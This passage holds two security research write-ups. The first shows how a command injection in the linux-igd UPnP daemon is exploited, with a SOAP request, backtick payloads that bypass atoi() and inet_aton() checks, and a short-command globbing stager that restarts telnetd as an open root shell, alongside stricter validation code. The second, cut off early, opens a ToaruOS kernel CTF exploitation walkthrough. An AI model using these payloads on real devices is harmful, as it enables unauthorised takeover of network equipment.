To have a functional service that simulates a real network device, our
virtual machine needs two interfaces:

- WAN interface (created as a dummy interface)
- LAN interface (the one we are connected to via SSH).

$ sudo ip link add name dummy0 type dummy
$ sudo ip link set dummy0 up
$ sudo ip addr add 192.168.13.37/24 dev dummy0

To verify that the interface has been correctly created and configured, use
the following command.

$ ip addr show dummy0

Once the tests are complete, it can be deleted using the following command.

$ sudo ip link delete dummy0

To set up debugging, GDB will be used to place a breakpoint on the
system() function. First, to get more verbose logs, set the debug_mode
value in the file /etc/upnpd.conf as follows.

# Daemon debug level. Messages are logged via syslog to debug.
# 0 - no debug messages
# 1 - log errors
# 2 - log errors and basic info
# 3 - log errors and verbose info
# default = 0
debug_mode = 3

The service can then be started using the following command.

$ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -f dummy0 ens3

To debug with GDB, simply retrieve the PID of the process associated with
the service.

$ ps auxf | grep upnpd
$ sudo gdb -p <PID>
(gdb) break system
(gdb) c

Now that the service is up and running and the debugging setup is complete,
the next step is to interact with it. To do this, we need to review the
contents of the gatedesc.xml and gateconnSCPD.xml files, which are located
in /etc/linuxigd/. Although we were not always fans of AI, we have come to
realize that, as the saying goes, "Only fools do not change their minds!"
With that in mind, it might be worthwhile to use a Large Language Model
(LLM) based on the GPT-4 architecture to parse the XML files and generate
the necessary HTTP requests for interacting with the service. This approach
is especially useful when working with a service that has been enhanced
with new features (but is still based on linux-igd within the SDK). For
instance, ChatGPT was able to provide the HTTP request needed to reach the
vulnerable function pmlist_AddPortMapping().

POST /upnp/control/WANIPConn1 HTTP/1.1
Host: 127.0.0.1:49152
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Content-Length: 704

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                xmlns:urn="urn:schemas-upnp-org:service:WANIPConnection:1">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:AddPortMapping>
         <NewRemoteHost></NewRemoteHost>
         <NewEnabled>1</NewEnabled>
         <NewLeaseDuration>1</NewLeaseDuration>
         <NewPortMappingDescription>POC</NewPortMappingDescription>
         <NewProtocol>AAA</NewProtocol>
         <NewExternalPort>BBBBB</NewExternalPort>
         <NewInternalClient>CCCCCCCCCCCCCCC</NewInternalClient>
         <NewInternalPort>DDDDD</NewInternalPort>
      </urn:AddPortMapping>
   </soapenv:Body>
</soapenv:Envelope>


Once the request is sent using curl, the following behavior can be
observed.

$ curl -v \
    -d @body.soap \
    -H 'Content-Type: text/xml; charset="utf-8"' \
    -H 'SOAPAction: "...IPConnection:1#AddPortMapping"' \
    'http://127.0.0.1:49152/upnp/control/WANIPConn1'

$ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -f dummy0 ens3
upnpd[1878]: Initializing UPnP SDK ...
upnpd[1878]: UPnP SDK Successfully Initialized.
upnpd[1878]: Setting the Web Server Root Directory to /etc/linuxigd
upnpd[1878]: Succesfully set the Web Server Root Directory.
upnpd[1878]: Registering the root device with descDocUrl
http://10.0.2.15:49152/gatedesc.xml
upnpd[1878]: IGD root device successfully registered.
upnpd[1878]: Advertisements Sent.  Listening for requests ...
upnpd[1878]: ActionName = AddPortMapping
upnpd[1878]: appended 1 AAA BBBBB CCCCCCCCCCCCCCC DDDDD 1
upnpd[1878]: /sbin/iptables -t nat -I PREROUTING -i dummy0 -p AAA
--dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
upnpd[1878]: /sbin/iptables -A FORWARD -p AAA -d CCCCCCCCCCCCCCC
--dport DDDDD -j ACCEPT
upnpd[1878]: ScheduleMappingExpiration: DevUDN: uuid:XXXXXXXX-XXXX-XXXX-XXX
X-XXXXXXXXXXXX ServiceID: urn:upnp-org:serviceId:WANIPConn1 Proto: AAA
ExtPort: BBBBB Int: CCCCCCCCCCCCCCC.DDDDD at: Mon Jan  1 00:00:00 1970
 eventId: 0
upnpd[1878]: PortMappingNumberOfEntries: 1
upnpd[1878]: AddPortMap: DevUDN: uuid:XXXXXXXX-XXXX-XXXX-8e6c-XXXXXXXXXXXX
ServiceID: urn:upnp-org:serviceId:WANIPConn1 RemoteHost: (null) Prot: AAA
ExtPort: BBBBB Int: CCCCCCCCCCCCCCC.DDDDD
upnpd[1878]: ExpireMapping: Proto:AAA Port:BBBBB
upnpd[1878]: /sbin/iptables -t nat -D PREROUTING -i dummy0 -p AAA
--dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
upnpd[1878]: [HIT 3] /sbin/iptables -D FORWARD -p AAA -d CCCCCCCCCCCCCCC
--dport DDDDD -j ACCEPT
upnpd[1878]: ExpireMapping: UpnpNotifyExt(deviceHandle,uuid:XXXXXXXX-XXXX-X
XXX-XXXX-XXXXXXXXXXXX,urn:upnp-org:serviceId:WANIPConn1,propSet)
  PortMappingNumberOfEntries: 0

Please note that after the HTTP request was sent, four system commands were
executed. For clarity, we will summarize them as follows, with the portions
before the first injection point replaced by "U".

$ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
$ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT
$ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
$ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT

With the prefix abstracted away, commands one and three are identical, as
are commands two and four. To summarize, here are the distinct commands
that were executed once the request was processed by the service.

$ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
$ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT

Now, the fun begins!

---------------------------------------------------------------------------
--[ 5. Becoming a Bash Jiu Jitsu white belt

Currently, it is possible to inject ourselves into two different commands,
at several locations within each of them. However, we must overcome two
problems.

1. We control exactly 28 characters ("AAA", "BBBBB", "CCCCCCCCCCCCCCC",
   "DDDDD") in the first command and 23 in the second.
2. Our injection points are discontinuous and there are elements (command
   options) between our different injection points.

The backtick or backquote (`) in shell scripting is used for command
substitution, where the shell executes the command inside the backticks
and replaces the backtick expression with the output of the command. It
is supported by many Unix-like shells, including sh (Bourne Shell), bash
(Bourne Again Shell), ash (Almquist Shell) and dash (Debian Almquist
Shell).

+-------+----------------+------------------------------------------------+
| Shell | "`" Supported? | Version(s) Supporting Backquotes               |
+-------+----------------+------------------------------------------------+
| sh    | Yes            | All versions (all modern POSIX-compliant)      |
| bash  | Yes            | All versions (from 1.0 in 1989 to present)     |
| ash   | Yes            | All versions (since 1989, including BusyBox)   |
| dash  | Yes            | All versions (since 2001)                      |
+-------+----------------+------------------------------------------------+

We will use this feature to get rid of the parts we do not need: enclosing
the fixed command options in backquotes turns them into command
substitutions which, since they produce no output on stdout, expand to
nothing and thereby concatenate our various injection points.

$ U ;A` --dport `BBB` -j DNAT --to `CCCCCCCCCCCCC`:`DDDD
...
sh: --dport: command not found
sh: -j: command not found
sh: ABBBCCCCCCCCCCCCCDDDD: command not found
$ U ;A` -d `CCCCCCCCCCCCC` --dport `DDDD -j ACCEPT
...
sh: -d: command not found
sh: --dport: command not found
sh: ACCCCCCCCCCCCCDDDD: command not found

We observe that the command ABBBCCCCCCCCCCCCCDDDD (length 21) is executed,
as well as the command ACCCCCCCCCCCCCDDDD (length 18). You might say that
exploiting a command injection with 21 (or 18) characters is easy enough
to do with minimal effort. So let's make things a little more complex.
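
To make the mechanics explicit, here is a minimal sketch of how the string
handed to system() comes together once our values are substituted. The
format string is an assumption reconstructed from the log output shown
earlier (the real source may differ), and build_dnat_cmd() is a
hypothetical helper, not a function of linux-igd.

```c
#include <stdio.h>

/*
 * Assumed format string, reconstructed from the daemon's log output;
 * the actual linux-igd source may differ in detail.
 */
#define DNAT_FMT \
    "/sbin/iptables -t nat -I PREROUTING -i %s -p %s --dport %s " \
    "-j DNAT --to %s:%s"

/*
 * Hypothetical helper: expand the template the way a daemon built around
 * snprintf() + system() would. Returns 0 on success, -1 on truncation.
 * Nothing is executed here; only the string is built.
 */
int build_dnat_cmd(char *out, size_t outlen, const char *ext_if,
                   const char *proto, const char *ext_port,
                   const char *int_ip, const char *int_port)
{
    int n = snprintf(out, outlen, DNAT_FMT,
                     ext_if, proto, ext_port, int_ip, int_port);

    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}
```

Called with the values ;A` and `BBB` and `CCCCCCCCCCCCC` and `DDDD, the
buffer ends with exactly the first payload line shown above.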

---------------------------------------------------------------------------
--[ 6. Becoming a Bash Jiu Jitsu purple belt

Some of the variants of linuxigd (linux-igd) you may come across implement
security checks on specific values. For example, some of the most
up-to-date variants check the values of the XML nodes NewExternalPort and
NewInternalPort with the function atoi(). You may encounter code snippets
like the one below.

ext_port = GetFirstDocumentItem(ca_event->ActionRequest, "NewExternalPort")
...
/* validate the ports */
a = atoi(ext_port);
if (a > 65535 || a < 1)
{
    return -1;
}


Validating these values is a good idea but, unfortunately for the
developers, atoi() is the wrong tool for the job. Consider the file
test_atoi.c as an example, containing the following C code.

#include <stdio.h>
#include <stdlib.h>

int main() {
    char numberStr[] = "5`BB`";
    int a = atoi(numberStr);
    if (a > 65535 || a < 1)
    {
        return -1;
    }
    return 0;
}


Compile it using the command below, run it, and then retrieve the value of
the return code.

$ gcc test_atoi.c -o test_atoi
$ ./test_atoi
$ echo $?
0

It is clear that the payload (the value contained in the NewExternalPort
node) has bypassed the security check. The atoi() function converts a
string into an integer, stopping at the first non-numeric character. It
first encounters the character 5, which is a valid digit, and then the
backtick. Since backticks are not part of a valid integer, atoi() stops
parsing at this point and returns 5, which passes the range check. The
price of bypassing this check is that fewer characters are available for
the command injection: the nodes NewExternalPort and NewInternalPort must
follow the structure of "5`BB`" and "6`DDD", for example (the exact layout
depends on the target you want to exploit).
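
For comparison, a stricter check could look like the sketch below. It is
only an illustration of what the atoi() test misses: parse_port_strict()
is a hypothetical name, and it relies on strtol() with an end pointer so
that any trailing bytes are rejected.

```c
#include <errno.h>
#include <stdlib.h>

/*
 * Hypothetical stricter replacement for the atoi() check: returns the
 * port number (1..65535), or -1 if the string is not purely a valid port.
 */
int parse_port_strict(const char *s)
{
    char *end;
    long v;

    /* Reject NULL, empty input, signs and leading whitespace up front. */
    if (s == NULL || *s < '0' || *s > '9')
        return -1;

    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0')
        return -1;      /* overflow, or trailing bytes such as "`BB`" */
    if (v < 1 || v > 65535)
        return -1;
    return (int)v;
}
```

With this variant the value "5`BB`" is refused, whereas atoi() happily
returns 5 for it.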

Although we currently have fewer characters at our disposal, let's try to
go one step further and make the security checks stricter.

---------------------------------------------------------------------------
--[ 7. Becoming a Bash Jiu Jitsu black belt

Port checks having been bypassed, let's imagine that the target now checks
the IP value using the inet_aton() function as shown below.

int_ip = GetFirstDocumentItem(ca_event->ActionRequest, "NewInternalClient")
...
/* validate the IP address */
struct in_addr req_addr;
if (0 == inet_aton(int_ip, &req_addr))
{
    return -1;
}


Consider the file test_inet_aton.c as an example, containing the following
C code.

#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>

int main() {
    const char *ip_str_a = "192.168.1.1";
    const char *ip_str_b = "192.168.1.1 `C`";
    struct in_addr addr_a;
    struct in_addr addr_b;

    if (0 == inet_aton(ip_str_a, &addr_a)) {
        printf("Internal Error.\n");
        return -1;
    }
    if (0 == inet_aton(ip_str_b, &addr_b)) {
        printf("Internal Error.\n");
        return -1;
    }

    return 0;
}


Compile it using the command below, run it, and then retrieve the value of
the return code.

$ gcc test_inet_aton.c -o test_inet_aton
$ ./test_inet_aton
$ echo $?
0

What happens is that inet_aton() succeeds in converting the IP address as
long as the initial part of the string is a valid IP address. After
parsing "192.168.1.1", inet_aton() encounters " `C`". These characters
are not valid in an IP address, but because they are separated from it by
a space they are simply ignored (this is how glibc behaves; other C
libraries may be stricter). Consequently, the in_addr struct will contain
the binary representation of the IP address "192.168.1.1".
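
Similarly, a stricter IP check can be sketched with inet_pton(), which,
unlike inet_aton(), only accepts a complete dotted-decimal string.
is_strict_ipv4() is a hypothetical helper used for illustration; it is not
taken from any linux-igd variant.

```c
#include <arpa/inet.h>
#include <stddef.h>

/*
 * Hypothetical stricter check: returns 1 only if s is exactly a
 * dotted-decimal IPv4 address with nothing before or after it.
 */
int is_strict_ipv4(const char *s)
{
    struct in_addr addr;

    return s != NULL && inet_pton(AF_INET, s, &addr) == 1;
}
```

Here "192.168.1.1" is accepted, while "192.168.1.1 `C`" is refused because
of the trailing bytes.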

$ U ;A` --dport 5`BB` -j DNAT --to 192.168.1.1 `C`:6`DDD
...
sh: --dport: command not found
sh: -j: command not found
sh: :6: command not found
sh: ABBCDDD: command not found
$ U ;A` -d 192.168.1.1 `C` --dport `DDDD -j ACCEPT
...
sh: -d: command not found
sh: --dport: command not found
sh: ACDDDD: command not found

All security checks have been bypassed, leaving 7 (or 6) characters to
carry out the command injection when the IP is 192.168.1.1, and 9 (or 8)
when the IP has the format 10.10.0.1. In other words, the format of the
target's IP address directly affects the number of characters that can be
controlled for the injection. Depending on the vendor, different default
IPs can be defined for their network equipment, but the two formats
mentioned above are generally the most common.

---------------------------------------------------------------------------
--[ 8. Claiming supremacy over the mats

The intriguing part, of course, is answering the question: how can
arbitrary commands be executed when only 7 characters are known to be
controllable?

The answer is to take advantage of globbing. Globbing is the process of
pattern matching for filenames and behaves similarly across shells like sh,
bash, ash, and dash, as they all follow POSIX standards. Common globbing
patterns such as *, ?, and [...] are supported in all these shells,
allowing users to match groups of files using wildcards. However, bash
stands out by offering advanced features like extended globbing and
recursive globbing with **. These are not available in ash, dash, or sh,
which are more minimalistic and focus on speed and efficiency.

The order in which files are matched during globbing generally follows
lexicographical order, but it varies with the system's locale. In the
C (POSIX) locale, names are compared byte by byte, so files starting with
digits come first, followed by uppercase letters and then lowercase
letters. Other locales, such as the UTF-8 ones commonly set by default,
may interleave uppercase and lowercase letters. For filenames containing
special characters, different behaviors have been observed: they may be
listed either first or last. While the basic globbing behavior is
consistent across all shells, the ordering of special characters, numbers,
and letters therefore depends on the locale. Here is a simple example.

On the virtual machine used previously, create a few files using the
command below.

$ touch .A .B .a .b .1

With bash (or zsh) as the shell, the following result is obtained.

$ echo .?
.1 .a .A .b .B

However, with ash (BusyBox version), the following result is obtained.

$ echo .?
.. .1 .A .B .a .b

After a little investigation, the discrepancies appear to come from locale
differences between the interpreters. ash uses the C locale (also known as
the POSIX locale), which is the default system locale typically used in
Unix-like operating systems when no specific locale is set. The related
sorting does not take into account accents, case folding, or linguistic
rules. Characters are sorted by their ASCII values, in the following
order.

- Digits (0-9) first.
- Uppercase letters (A-Z) next.
- Lowercase letters (a-z) last.
- Special characters (like !, #, etc.) have a predefined order, which is
  based on their ASCII values.
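
The C locale ordering above is nothing more than a byte-wise comparison,
which the following sketch reproduces with qsort() and strcmp(). The
function names are ours and purely illustrative; a real shell sorts its
glob results internally.

```c
#include <stdlib.h>
#include <string.h>

/* qsort() comparator: plain byte-wise comparison, as in the C locale. */
static int cmp_bytes(const void *a, const void *b)
{
    return strcmp(*(const char *const *)a, *(const char *const *)b);
}

/* Sort file names the way a C-locale glob expansion would order them. */
void sort_c_locale(const char **names, size_t n)
{
    qsort(names, n, sizeof *names, cmp_bytes);
}
```

Sorting .a .B .1 .b .A this way yields .1 .A .B .a .b, which matches the
ash output above (leaving aside the .. entry).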

It is time to put little dishes into the big ones and mix all the
ingredients together to make a good soup. To do this, the first thing we
need to do is define the only limitation that our technique confronts us
with.

As a stager is about to be created, the current directory of the process
being exploited (upnpd) must be writable. A CWD environment variable, when
present, typically refers to the current working directory of the shell or
process: it holds the path of the directory in which the process is
running or from which it was launched. Note, however, that CWD is not a
standard environment variable (the one defined by POSIX is PWD); it is
mostly used by specific applications or scripts to track the current
directory.

Alternatively, the /proc/self/cwd symbolic link in Linux can be used to
track the current working directory of a running process, as it points to
the directory in which the process is currently operating. Since
/proc/self refers to the current process, reading /proc/self/cwd provides
the absolute path to that process's working directory. Note that this link
is automatically updated when the process changes its working directory,
such as when it executes the cd command or changes directories
programmatically. By reading the target of /proc/self/cwd, the working
directory of a process can be determined programmatically at any given
time (making it a useful tool for monitoring).
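
As a minimal sketch of that idea, the helper below resolves /proc/self/cwd
and tests whether the directory is writable. cwd_is_writable() is a
hypothetical name; note that it inspects the calling process, so checking
a lab target such as upnpd would instead mean reading /proc/<pid>/cwd
with sufficient privileges.

```c
#include <unistd.h>

/*
 * Resolve /proc/self/cwd into buf (Linux-specific). Returns 1 if the
 * directory is writable by the caller, 0 if it is not, -1 on error.
 */
int cwd_is_writable(char *buf, size_t buflen)
{
    ssize_t n;

    if (buf == NULL || buflen == 0)
        return -1;

    n = readlink("/proc/self/cwd", buf, buflen - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';      /* readlink() does not NUL-terminate */

    return access(buf, W_OK) == 0 ? 1 : 0;
}
```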

Let's start with the simplest case (using ash), taking control of the
target when we can execute an 8-character command.

Create files named "killall" and "telnetd".

$ >killall
$ >telnetd

Kill telnetd and restart it with the desired options (-lsh).

$ k* t*
$ t* -lsh

Yes, it is that simple. The same process may be used with 7 characters.

Clean the current directory (/proc/self/cwd).

$ rm -r *

Writing string "killal\n" into ".a".

$ >killal
$ >echo
$ *>>l
$ cp l .a
$ rm -r *

Writing string " echo\n" into ".c".

$ >" "
$ >echo
$ e* *>>l
$ cp l .c
$ rm -r *

Writing string "telnet\n" into ".d".

$ >telnet
$ >echo
$ *>>l
$ cp l .d
$ rm -r *

Writing string "lsh\n" into ".g".

$ >lsh
$ >echo
$ *>>l
$ cp l .g
$ rm -r *

Writing string "killal" into ".a".

$ >head
$ cp .a f
$ cp f h*
$ rm f
$ >-c
$ >6
$ h* *>>h
$ cp h .a
$ rm h

Writing string "telnet" into ".d".

$ cp .d f
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .d
$ rm h

Writing string "lsh" into ".g".

$ cp .g f
$ cp f h*
$ rm f
$ rm 6
$ >3
$ h* *>>h
$ cp h .g
$ rm h

Writing string " " into ".c".

$ cp .c f
$ cp f h*
$ rm f
$ rm 3
$ >1
$ h* *>>h
$ cp h .c
$ rm h

Writing string "l" into ".b".

$ >echo
$ e* l>>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .b
$ rm h

Writing string "d" into ".e".

$ >echo
$ e* d>>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .e
$ rm h

Writing string "-" into ".f".

$ >echo
$ e* ->>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .f
$ rm h

Executing command "killall telnetd".

$ >cat
$ cp .a A
$ cp .b B
$ cp .c C
$ cp .d D
$ cp .e E
$ c* ?|sh

Executing command "telnetd -lsh".

$ cp .d A
$ cp .e B
$ cp .c C
$ cp .f D
$ cp .g E
$ c* ?|sh
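
When preparing such a stager, it is easy to slip in a line that is one
character too long. The sketch below shows one possible sanity check;
first_over_budget() is a hypothetical helper, and the budget is whatever
the target leaves you (7 or 8 in the examples above).

```c
#include <stddef.h>
#include <string.h>

/*
 * Return the index of the first command longer than budget characters,
 * or -1 if every command fits.
 */
int first_over_budget(const char *const cmds[], size_t n, size_t budget)
{
    for (size_t i = 0; i < n; i++)
        if (strlen(cmds[i]) > budget)
            return (int)i;
    return -1;
}
```

Feeding it lines such as "cp l .a", "e* *>>l" or "c* ?|sh" with a budget
of 7 reports no offender, while ">killall" is flagged as too long.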

---------------------------------------------------------------------------
--[ 9. Conclusion

Of course, the chosen target was just an excuse (as many vulnerabilities
have already been identified and exploited in the past) for presenting
the very subject of the article, which is the optimization of command
injection in the context of using a limited number of characters. We have
demonstrated that even with just a few characters at our disposal, we are
capable of writing a stager (in a file) that can execute a real malicious
payload and thus compromise a device.

---------------------------------------------------------------------------
--[ 10. Acknowledgments (527e876c0d7e3049d1d99f00f3fbf9a9b0c63ccf)

I'd like to thank all the people we have come to know and will come to know
in our lives as hackers, as well as all those who have made the effort to
document their research work, and will do so in the future.

We can finally become immortals. Thank you for everything.

---------------------------------------------------------------------------
--[ 11. References



|=-----------------------------------------------------------------------=|
|=----------------------=[ 8 - Breaking ToaruOS ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=----------------=[ CTF as a kernel exploitation intro ]=---------------=|
|=-----------------------------------------------------------------------=|
|=-------------=[ NOT / Firzen ]=---------=[ Binary Gecko ]=-------------=|
|=-----------------------------------------------------------------------=|


---[ Index

0 - Introduction
1 - The Challenge
  1.1 - Environment
2 - ToaruOS
  2.1 - Mitigations
3 - Kernel Bugs
4 - Searching for a bug
  4.1 - How to open a file
  4.2 - Becoming root normally
  4.3 - SUID on the kernel side
  4.4 - ptrace
  4.5 - Poking the first hole
  4.6 - Flat mapping excursion
5 - The bug
6 - Write-what-where, but where?
  6.1 - No KASLR
  6.2 - SUIDn't
7 - In Closing
A - Exploit Code

--[ 0 - Introduction


In this article I would like to talk about the process of finding and
exploiting a kernel zero day.

I will use a CTF challenge about finding zero days in a hobby OS kernel
as scaffolding and walk through the layers of protection that the
kernel provides and one of the zero days used to break them.

I think it is a great way to dive into some of the lower level code and
bug classes that can only occur on a kernel level without having to
first understand the internals of a major modern OS kernel and its many
mitigations.

--[ 1 - The Challenge


During the 38C3 conference HXP hosted a CTF that included a kernel
exploitation challenge called "Ser Szwajcarski" (Polish for Swiss
cheese). Apart from the name, the challenge was unusual in two other
respects:

Firstly, it wasn't for any major OS, but instead for a relatively niche
hobby kernel.

Secondly, it targeted what was, at the time, the current version of the
OS. So really, the challenge was to find a zero day for the OS.

--[ 1.1 - Environment


Before we get into the details, what was the setup of the challenge?

You were provided a low-priv remote shell running on ToaruOS and had
to access the flag in a file that only the root user could access.


They also provided a Dockerfile so that you could set up an identical
local test environment.

--[ 2 - ToaruOS


So, what kind of OS is ToaruOS?
It is a unix-like hobby OS written by Kevin Lange. It is one of the
more advanced hobby OS projects and still actively being developed.
But this isn't a history lesson, so I'll get straight to the parts that
are relevant to us.

--[ 2.1 - Mitigations


Modern operating systems employ a large number of mitigations to make
them more resilient, for safety and for security.

I'll give a brief overview of the major common ones on x86_64 Linux and
then go over how they apply to ToaruOS in 2.1.5.

Basically all of them have analogues for different architectures and
operating systems, but that's way too much to cover.

I am also leaving out several other mitigations that aren't relevant to
the vulnerability or are Linux-specific.

--[ 2.1.1 - CPU rings


On x86 the CPU can run with several distinct privilege levels called
rings. These restrict which actions the CPU is allowed to perform.
For example you can not change the CR3 register, which points to the
page directory, while in ring 3. For this article all you need to know 
is that ring 0 is 'kernel mode' and ring 3 is 'user mode'.

This is why system calls exist. A system call is just code in ring 3
causing an interrupt that is handled by the kernel in ring 0.
That code in the kernel then interprets the request and checks if it is
sane and allowed. If so it then performs an action on behalf of that
ring 3 request.

--[ 2.1.2 - Page protections

A page is a physical region of memory that can be mapped to one or more
virtual addresses. These mappings have several flags that determine
how the mapped page can be accessed. For this article we only care
about the following 3 flags:


  P   -  Present
      Is this page mapped at all?

  R/W -  Read/Write
      Is this page read-only or writable?

  U/S -  User/Supervisor
      Is this page accessible from ring 3 or only ring 0?

I want to explicitly point out that these flags exist for each separate 
mapping of a page. The same physical page can be mapped at multiple 
virtual addresses with different permissions.
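
To make the three flags concrete, here is a small sketch of how they sit
in the low bits of an x86-64 page table entry. The macro and function
names are mine, not ToaruOS's, and the check is simplified: on real
hardware the effective permission also depends on the entries of the
upper paging levels.

```c
#include <stdint.h>

/* Low flag bits of an x86-64 page table entry. */
#define PTE_PRESENT  (UINT64_C(1) << 0)  /* P:   mapping is present    */
#define PTE_WRITABLE (UINT64_C(1) << 1)  /* R/W: 0 = read-only         */
#define PTE_USER     (UINT64_C(1) << 2)  /* U/S: 0 = ring 0 only       */

/* Returns 1 if ring 3 may write through this mapping, 0 otherwise. */
int pte_user_can_write(uint64_t pte)
{
    uint64_t need = PTE_PRESENT | PTE_WRITABLE | PTE_USER;

    return (pte & need) == need;
}
```

A typical kernel data mapping (P and R/W set, U/S clear) therefore fails
this test, even though it is perfectly writable from ring 0.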

--[ 2.1.3 - KASLR - Kernel Address Space Layout Randomization


This is the kernel version of the user space ASLR you may already be
familiar with. What this effectively means is that you don't know ahead of
time where in memory the kernel will be mapped.

--[ 2.1.4 - SMEP/SMAP - Supervisor Mode Execution/Access Prevention


These two mitigations prevent the kernel from accessing userspace
memory directly through a pointer. With SMAP, any data access has to
instead go through special functions that will temporarily disable the
mitigation. With SMEP, any execution of userspace memory in kernel mode
is completely disallowed. When the kernel returns to userspace it has to
also switch to user mode at the same time.

--[ 2.1.5 - ToaruOS mitigations overview

+ CPU rings
+ Page Protections
- KASLR
- SMEP/SMAP


On ToaruOS the first two mitigations exist and the latter two don't.
This is more or less expected since the first two are mainly enforced
by the hardware architecture rather than the OS.

The first three of those are the ones you should keep in mind for the
rest of this article.

--[ 3 - Kernel bugs


We are all very used to the security guarantees that our OS provides
and most of us probably take them for granted.

Of course, you can't open /etc/shadow as a normal user.
Of course, you can't just attach a debugger to a root process and alter
what it does.
Of course, you can't change the owner of an suid executable and keep
the suid flag.

But all of those things are enforced by the operating system.

It is common to become root or SYSTEM to demonstrate a kernel exploit,
but the truth is that you effectively have even higher privileges.

If the OS, specifically the kernel, isn't stopping you, you can do
anything.
(Yes, I am ignoring hypervisor based security for dramatic reasons)

All this to say: Kernel bugs may have the same root causes as many user
space bugs, but there are also entirely different bug classes that can
only really exist in a kernel.

So, I encourage you to challenge your preconceptions and question even
those "obvious" security concepts. ToaruOS has quite a few
similarities to Linux, so it is tempting to assume it provides all of
the same guarantees.

--[ 4 - Searching for a bug


Since the kernel's job is to enforce security guarantees it makes sense
to start by looking at how exactly it does that. Our goal is simply to
read a file, so let's look at how we may be able to open it.

--[ 4.1 - How to open a file


If you want to open a file in C you call the libc open() function.
This function internally then issues the corresponding system call.

The kernel side code of ToaruOS that handles the syscall is sys_open()
in '/kernel/sys/syscall.c'.

    long sys_open(const char * file, long flags, long mode) {
        PTR_VALIDATE(file);
        if (!file) return -EFAULT;
        fs_node_t * node = kopen((char *)file, flags);

        int access_bits = 0;

        if (node && (flags & O_CREAT) && (flags & O_EXCL)) {
            close_fs(node);
            return -EEXIST;
        }
        ...


The first thing the kernel does is to check that 'file' is a valid user
space pointer.
The 'ptr_validate()' function checks that the address is in user space
and is mapped with appropriate flags. This will be important later.

It then tries to open that file with 'kopen()'. If the file already exists
and both O_CREAT and O_EXCL were requested, it bails out with -EEXIST.
Afterwards, it continues with the access checks.

This is how the OS enforces file system access permissions. If you want
to open a file it will check all of the permissions before the file is
ever visible in user mode.

        ...
        int fd = process_append_fd(this_core->current_process, node);
        ...
        return fd;
    }


If all the checks have passed 'process_append_fd()' is called and the
file descriptor is now visible in the user mode process.
'fd' is then returned from the system call and the libc then returns it
from 'open()'.

Since the checks here look sane, we need to either change the file's
permissions or elevate our privileges. Let's take a look at elevating
privileges.

--[ 4.2 - Becoming root normally


You may have wondered how 'sudo' can make you 'root' on a Linux system.

It is definitely one of those "obvious" things I mentioned earlier, so
you may never have given it a second thought. But if you do, it seems a
little odd.

'sudo' is a program that runs in 'user mode' in ring 3 like any other.
It can't issue a magic CPU instruction that changes the user and it
can't write in kernel memory. If it could then so could any other user
mode process.
Clearly it uses the 'setuid()' libc function, but using it to switch to
another user requires privileges.

But we can run 'sudo' as a low-privileged user to become root, so what
makes 'sudo' special?

You probably already know that the way it works is that the file system
doesn't just store permissions for read/write/execute access, but can
also store flags and capabilities.

Particularly the SUID flag denotes that a program should be executed
not as the user that starts it, but as the user that owns the file.

On ToaruOS it works exactly the same way as it does on Linux:

    local@livecd ~$ ls -al /bin/sudo
    -r-sr-xr-x 1 root root 10384 Mar 16 17:26 /bin/sudo


Note that instead of 'x' it shows 's' for the execute permission,
showing the SUID bit is set.

--[ 4.3 - SUID on the kernel side


The implementation of the SUID bit is very straightforward in ToaruOS
and can be found in 'elf_exec()' in '/kernel/misc/elf64.c'.

        if ((file->mask & S_ISUID) &&
            !(this_core->current_process->flags &
            (PROC_FLAG_TRACE_SYSCALLS | PROC_FLAG_TRACE_SIGNALS)))
        {
            /* setuid */
            this_core->current_process->user = file->uid;
        }


This is already the full implementation. If the 'S_ISUID' flag of the
file is set the user id of the process is set to the owner of the file.

The second half of the if clause exists so that if you start an SUID
binary with a debugger attached it doesn't change the user.

--[ 4.4 - ptrace


ToaruOS has the ability to debug programs in user space. It has a
'ptrace' syscall to do this, similar to the way it works on Linux.

'ptrace' lets you attach to a process - the 'tracee' - and to
manipulate it in various ways as the 'tracer'.
You can read registers, single-step, read or alter memory, etc.

'ptrace_handle()' in '/kernel/sys/ptrace.c' implements it in ToaruOS.
That function is just a huge switch statement based on which of these
operations was requested. Instead let's look at 'ptrace_peek()' and
'ptrace_poke()' for the moment.

'peek' reads a byte and 'poke' writes a byte in the tracee.
Keep in mind that when we are in the 'ptrace' syscall the current
process is the 'tracer', not the 'tracee'.

Let's start with 'ptrace_peek()':

    long ptrace_peek(pid_t pid, void * addr, void * data) {
        if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
        process_t * tracee = process_from_pid(pid);
        if (!tracee
            || (tracee->tracer != this_core->current_process->id) 
            || !(tracee->flags & PROC_FLAG_SUSPENDED)
        )
                return -ESRCH;


Again it starts by verifying a user provided pointer 'data'.

But notably it does NOT verify 'addr'. We will get back to that.

Then it looks up the 'tracee' process. If the 'tracee' doesn't exist,
or if we aren't the 'tracer', or if the process isn't in a suspended
state we will error out.

        union PML * page_entry = mmu_get_page_other(
            tracee->thread.page_directory->directory, (uintptr_t)addr);

        if (!page_entry) return -EFAULT;
        if (!mmu_page_is_user_readable(page_entry)) return -EFAULT;


